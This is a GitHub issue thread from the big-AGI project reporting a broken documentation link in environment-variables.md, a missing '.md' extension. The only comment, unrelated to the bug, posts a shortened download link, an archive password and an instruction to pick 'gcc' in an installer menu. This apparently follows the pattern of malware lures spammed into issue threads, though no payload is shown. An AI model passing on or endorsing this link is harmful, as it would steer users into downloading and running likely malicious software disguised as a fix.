### ISSUE TITLE
[BUG] Redirection to config-local-ollama.md is not working in environment-variables.md

### ISSUE THREAD

**Issue by darshmashru** [enricoros/big-AGI#628]
### Description

The redirection to config-local-ollama.md is not working in environment-variables.md because ".md" is missing in the URL.

### Device and browser

Desktop, Windows 11, Arc Browser - Chromium 128

### Willingness to Contribute

- [X] 🙋‍♂️ Yes, I would like to contribute a fix.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
